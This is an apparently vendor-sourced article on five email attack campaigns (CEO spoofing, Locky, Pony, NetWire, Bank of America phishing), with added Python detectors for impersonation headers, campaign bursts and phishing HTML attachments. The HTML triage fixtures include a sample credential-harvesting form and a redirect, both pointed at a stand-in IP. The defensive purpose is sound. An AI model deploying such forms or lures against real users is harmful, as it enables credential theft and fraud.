Email is still the primary attack vector for many cybercriminals. Alongside malicious attachments and URLs, credential phishing is on the rise, and it puts the everyday user, rather than a software flaw, at the root of the attack. Why? Cybercriminals are using advanced attack methods that consistently evade traditional detection tools. As a result, organizations are beginning to realize that these attacks can only be detected reliably through multi-dimensional behavioral analytics that operate on diverse data sources and draw on a full spectrum of machine learning techniques.
Over a two-month period, security analytics firm Niara worked with customers to analyze their email traffic and found a number of malicious email campaigns that sophisticated attackers were using to circumvent traditional defenses, gain a foothold within the enterprise and steal sensitive information. This slideshow presents five of the malicious email campaigns detected. Niara has also identified the tactics, techniques and procedures (TTPs) used in each, which can be used to determine whether your organization has been targeted by any of these campaigns.
Cyber Attacks Circumventing Traditional Defenses
Click through for more on five email attack campaigns that are being used to circumvent traditional defenses and gain a foothold within the enterprise, as identified by Karthik Krishnan, vice president, Product Management, Niara.
Spoofed CEO Email Campaign
This campaign was classified as a potential targeted attack: it had a single recipient. Targeted attacks use personalized knowledge about a specific target with the goal of causing immediate damage to the victim. The attacker had researched the target in advance and sent the CFO a spoofed email that appeared to come from the organization's CEO. The email requested a reply, looked legitimate and carried no attachments, so signature- and sandbox-based tools had nothing to inspect. Had the CFO replied, the attacker would have followed up with the details of an account to wire money into. Snapchat was hit by a similar tactic, in which an email impersonating its CEO was used to obtain employee payroll information.
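Because such an email carries no payload, the only place to catch it is in the headers: a known executive's display name in front of a foreign mailbox, a From header claiming the corporate domain without an SPF pass, or a Reply-To that quietly steers the conversation elsewhere. The following is an added example of those three checks; it is not Niara's code. The organization domain, the executive directory and the three sample messages are all constructed for the example.

```python
"""Header heuristics for executive-impersonation (BEC) email.

Added example, not Niara's code. The organisation domain, the executive
directory (display name -> real mailbox) and the sample messages below are
constructed for illustration.
"""
from email import message_from_string
from email.utils import parseaddr

ORG_DOMAIN = "example.com"                          # assumed corporate domain
EXECUTIVES = {"jane doe": "jane.doe@example.com"}   # constructed directory


def _norm(name):
    """Collapse case and whitespace so 'Jane  DOE' matches 'jane doe'."""
    return " ".join(name.lower().split())


def bec_indicators(raw_message):
    """Return the list of indicator names that fire on a raw RFC 5322 message."""
    msg = message_from_string(raw_message)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_addr, reply_addr = from_addr.lower(), reply_addr.lower()
    from_domain = from_addr.rsplit("@", 1)[-1]
    auth = msg.get("Authentication-Results", "").lower()

    hits = []
    real_mailbox = EXECUTIVES.get(_norm(from_name))
    # A known executive's display name in front of some other mailbox
    # (typically a free-mail or lookalike domain the attacker controls).
    if real_mailbox and from_addr != real_mailbox:
        hits.append("display_name_impersonation")
    # Header From claims our own domain, but the receiving MTA did not record
    # an SPF pass: the From header was forged outright.
    if from_domain == ORG_DOMAIN and "spf=pass" not in auth:
        hits.append("unauthenticated_internal_sender")
    # Replies are steered to a mailbox other than the visible From, which is
    # how the "please reply" lure hands the thread to the attacker.
    if reply_addr and reply_addr != from_addr:
        hits.append("reply_to_mismatch")
        if reply_addr.rsplit("@", 1)[-1] != ORG_DOMAIN:
            hits.append("reply_to_external")
    return hits


# Constructed sample messages (not real captures).
FORGED_FROM = (
    "From: Jane Doe <jane.doe@example.com>\n"
    "To: cfo@example.com\n"
    "Reply-To: Jane Doe <jane.doe@mail-secure.net>\n"
    "Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=mail-secure.net\n"
    "Subject: Are you at your desk?\n\n"
    "I need a wire sent out today. Reply when you see this.\n"
)
LOOKALIKE = (
    "From: Jane Doe <jane.doe@examp1e.com>\n"
    "To: cfo@example.com\n"
    "Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=examp1e.com\n"
    "Subject: Quick favour\n\n"
    "Can you reply to this as soon as possible?\n"
)
LEGIT = (
    "From: Jane Doe <jane.doe@example.com>\n"
    "To: cfo@example.com\n"
    "Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com\n"
    "Subject: Board deck\n\n"
    "Attached is the draft for review.\n"
)

if __name__ == "__main__":
    for label, m in [("forged", FORGED_FROM), ("lookalike", LOOKALIKE), ("legit", LEGIT)]:
        print(label, bec_indicators(m) or "clean")
```

Note that the lookalike-domain message passes SPF (the attacker controls that domain), so only the display-name check catches it; conversely the forged-From message has the executive's exact address, so only the authentication and Reply-To checks fire. Run all three together rather than relying on any one.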
Locky Ransomware Campaign
In this campaign, attackers used malicious emails to compromise systems with malware from the Locky ransomware family, which encrypts the files on a compromised system. All of the emails were sent on the same day and appeared to come from the same sender. Their subject lines followed a single template, varying only the invoice number, to make each message look like an authentic billing notice. Each recipient was sent two document attachments with the same name, each containing the Bartallex macro downloader. If the recipient opened the document and allowed the macro to run, Locky was automatically downloaded onto the system. Same sender, same day, templated subjects and identical attachment names are exactly the attributes that make such a campaign stand out in gateway logs.
Witness Campaign
In this campaign, attackers attempted to compromise systems with malware from the Pony family, whose purpose is to steal credentials and install a backdoor for a more persistent presence on the endpoint. The Witness campaign, named after its email attachment (witness_supboena.doc), was the largest campaign by number of malicious emails sent: over two days it reached 335 employees at a single enterprise.
To socially engineer employees, the attackers put the company's name in the subject line followed by the string "witness subpoena." For those who opened the attachment, Pony malware was automatically downloaded onto their systems.
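Both the Locky and the Witness campaigns share a signature in gateway logs: one sender, a templated subject, the same attachment name over and over, and many recipients in a short window. The following added example (not Niara's code) clusters mail-log records on those attributes. The record format and field names are assumed, and every record is constructed: a four-recipient invoice burst with doubled attachments, a three-recipient "witness subpoena" wave spread over two days, and benign supplier invoices spread over several days that must not cluster.

```python
"""Cluster mail-gateway records into campaigns by sender and subject template.

Added example, not Niara's code. The record schema is assumed and every
record below is constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime

RECORDS = [
    # Invoice-themed burst: same sender, same minute, only the invoice number varies,
    # and each mail carries two attachments with the same name.
    {"ts": "2016-03-02T08:01:11", "sender": "billing@invoice-center.net", "rcpt": "alice@example.com",
     "subject": "Invoice 4471-0301", "attachments": ["invoice_4471.doc", "invoice_4471.doc"]},
    {"ts": "2016-03-02T08:01:14", "sender": "billing@invoice-center.net", "rcpt": "bob@example.com",
     "subject": "Invoice 4472-0301", "attachments": ["invoice_4472.doc", "invoice_4472.doc"]},
    {"ts": "2016-03-02T08:01:20", "sender": "billing@invoice-center.net", "rcpt": "carol@example.com",
     "subject": "Invoice 4473-0301", "attachments": ["invoice_4473.doc", "invoice_4473.doc"]},
    {"ts": "2016-03-02T08:02:02", "sender": "billing@invoice-center.net", "rcpt": "dave@example.com",
     "subject": "Invoice 4474-0301", "attachments": ["invoice_4474.doc", "invoice_4474.doc"]},
    # "Witness subpoena" wave over two days, company name in the subject.
    {"ts": "2016-03-10T07:55:00", "sender": "clerk@courtnotice-mail.net", "rcpt": "alice@example.com",
     "subject": "Example Corp witness subpoena", "attachments": ["witness_supboena.doc"]},
    {"ts": "2016-03-10T15:20:00", "sender": "clerk@courtnotice-mail.net", "rcpt": "bob@example.com",
     "subject": "Example Corp witness subpoena", "attachments": ["witness_supboena.doc"]},
    {"ts": "2016-03-11T16:10:00", "sender": "clerk@courtnotice-mail.net", "rcpt": "erin@example.com",
     "subject": "Example Corp witness subpoena", "attachments": ["witness_supboena.doc"]},
    # Benign supplier invoices: same template, but spread over four days.
    {"ts": "2016-03-02T09:30:00", "sender": "ap@supplier.example.net", "rcpt": "alice@example.com",
     "subject": "Invoice 88120", "attachments": ["inv88120.pdf"]},
    {"ts": "2016-03-05T09:30:00", "sender": "ap@supplier.example.net", "rcpt": "bob@example.com",
     "subject": "Invoice 88121", "attachments": ["inv88121.pdf"]},
    {"ts": "2016-03-06T09:30:00", "sender": "ap@supplier.example.net", "rcpt": "carol@example.com",
     "subject": "Invoice 88122", "attachments": ["inv88122.pdf"]},
]

DIGITS = re.compile(r"\d+")


def template(text):
    """Replace every digit run with <N>, so 'Invoice 4471-0301' and 'Invoice 4472-0301' collide."""
    return DIGITS.sub("<N>", text.strip().lower())


def find_campaigns(records, min_recipients=3, window_hours=72):
    """Group records by (sender, subject template); keep groups that hit enough
    distinct recipients inside the time window. Returns one summary per campaign."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["sender"].lower(), template(r["subject"]))].append(r)

    campaigns = []
    for (sender, subj_tpl), msgs in sorted(groups.items()):
        recipients = {m["rcpt"].lower() for m in msgs}
        if len(recipients) < min_recipients:
            continue
        times = sorted(datetime.fromisoformat(m["ts"]) for m in msgs)
        span_h = (times[-1] - times[0]).total_seconds() / 3600
        if span_h > window_hours:
            continue
        campaigns.append({
            "sender": sender,
            "subject_template": subj_tpl,
            "recipients": len(recipients),
            "span_hours": round(span_h, 2),
            "attachment_templates": sorted({template(a) for m in msgs for a in m["attachments"]}),
            # Two copies of the same attachment name in one mail, as in the invoice wave.
            "duplicate_attachment_in_one_mail": any(
                len(m["attachments"]) > len(set(m["attachments"])) for m in msgs),
        })
    return campaigns


if __name__ == "__main__":
    for c in find_campaigns(RECORDS):
        print(c)
```

The window and recipient threshold are the knobs to tune: a 24-hour window catches the same-day invoice burst but drops the two-day subpoena wave, so a hunt for slower campaigns needs a wider window and, to keep noise down, a higher recipient threshold.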
NetWire RAT Campaign
In this campaign, attackers attempted to install a remote access Trojan (RAT) from the well-documented NetWire malware family, used to steal credentials and take screenshots. NetWire has been used both in targeted attacks and in crime campaigns, which are directed at many recipients with the goal of probing for weak spots that can be used in later attacks.
The campaign targeted one organization for over a month, delivering two malicious email variants to 29 unique recipients within the organization. Some received an email carrying an HTML file, the rest an email carrying a ZIP file.
Bank of America Phishing Campaign
In this campaign, attackers sent emails informing employees of incorrect or missing details in their Bank of America accounts. The emails appeared to come from Bank of America and carried an attachment named Verify.html. Opening the attachment redirected victims to a page that asked for additional personal information. When a victim filled in and submitted the form, the data was sent to an attacker-controlled IP address hosted in Iran. Because the lure is a local HTML file rather than a link, URL reputation filtering never sees the first hop; the tell is where the form posts.
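An HTML attachment can be triaged statically before anyone opens it: parse the forms and any meta-refresh redirect, and check whether the destination is an IP literal or a host outside the impersonated brand's domains. The following is an added example of that triage, not Niara's code. The brand domain list and both sample documents are constructed, and the IP literal is taken from a documentation range rather than the real campaign's infrastructure.

```python
"""Static triage of an HTML email attachment for credential-harvesting forms.

Added example, not Niara's code. BRAND_DOMAINS and the sample documents are
constructed; 203.0.113.45 is a documentation address, not the campaign's server.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

BRAND_DOMAINS = {"bankofamerica.com"}   # assumed legitimate hosts for the impersonated brand
SENSITIVE = ("password", "passwd", "pin", "ssn", "card", "cvv", "account")


class FormCollector(HTMLParser):
    """Collect every <form> with its action and input fields, plus meta-refresh redirects."""

    def __init__(self):
        super().__init__()
        self.forms, self.redirects, self._form = [], [], None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["fields"].append((a.get("type", "text").lower(), a.get("name", "").lower()))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            content = a.get("content", "")          # e.g. "0;url=http://..."
            if "url=" in content.lower():
                self.redirects.append(content.split("=", 1)[1].strip())

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def destination_reasons(url):
    """Why a form action or redirect target looks wrong, or [] if it does not."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return []                                  # relative target: nothing to judge statically
    try:
        ipaddress.ip_address(host)
        return ["ip_literal_destination"]          # brands do not post logins to bare IPs
    except ValueError:
        pass
    if not any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS):
        return ["off_brand_destination"]
    return []


def triage_html(html):
    """Return one finding per suspicious form or redirect in the document."""
    p = FormCollector()
    p.feed(html)
    findings = []
    for f in p.forms:
        reasons = destination_reasons(f["action"])
        if not reasons:
            continue
        sensitive = sorted(n for t, n in f["fields"]
                           if t == "password" or any(k in n for k in SENSITIVE))
        if sensitive:
            reasons.append("collects_sensitive_fields")
        findings.append({"kind": "form", "target": f["action"], "fields": sensitive, "reasons": reasons})
    for url in p.redirects:
        reasons = destination_reasons(url)
        if reasons:
            findings.append({"kind": "redirect", "target": url, "fields": [], "reasons": reasons})
    return findings


# Constructed samples (not the real Verify.html).
PHISH_HTML = """<html><body><h2>Bank of America - Verify your account</h2>
<form method="post" action="http://203.0.113.45/verify.php">
  <input type="text" name="online_id">
  <input type="password" name="passcode">
  <input type="text" name="ssn">
  <input type="text" name="card_number">
  <input type="submit" value="Continue">
</form></body></html>"""
REDIRECT_HTML = """<html><head><meta http-equiv="refresh" content="0;url=http://203.0.113.45/login">
</head><body>Loading...</body></html>"""
LEGIT_HTML = """<html><body><form method="post" action="https://secure.bankofamerica.com/login">
  <input type="text" name="online_id"><input type="password" name="passcode"></form></body></html>"""

if __name__ == "__main__":
    for label, doc in [("phish", PHISH_HTML), ("redirect", REDIRECT_HTML), ("legit", LEGIT_HTML)]:
        print(label, triage_html(doc) or "clean")
```

A form that posts to the brand's own domain is not flagged even when it asks for a password, so a legitimate page saved as HTML stays quiet; the decision key is the destination, with the field list reported as severity context.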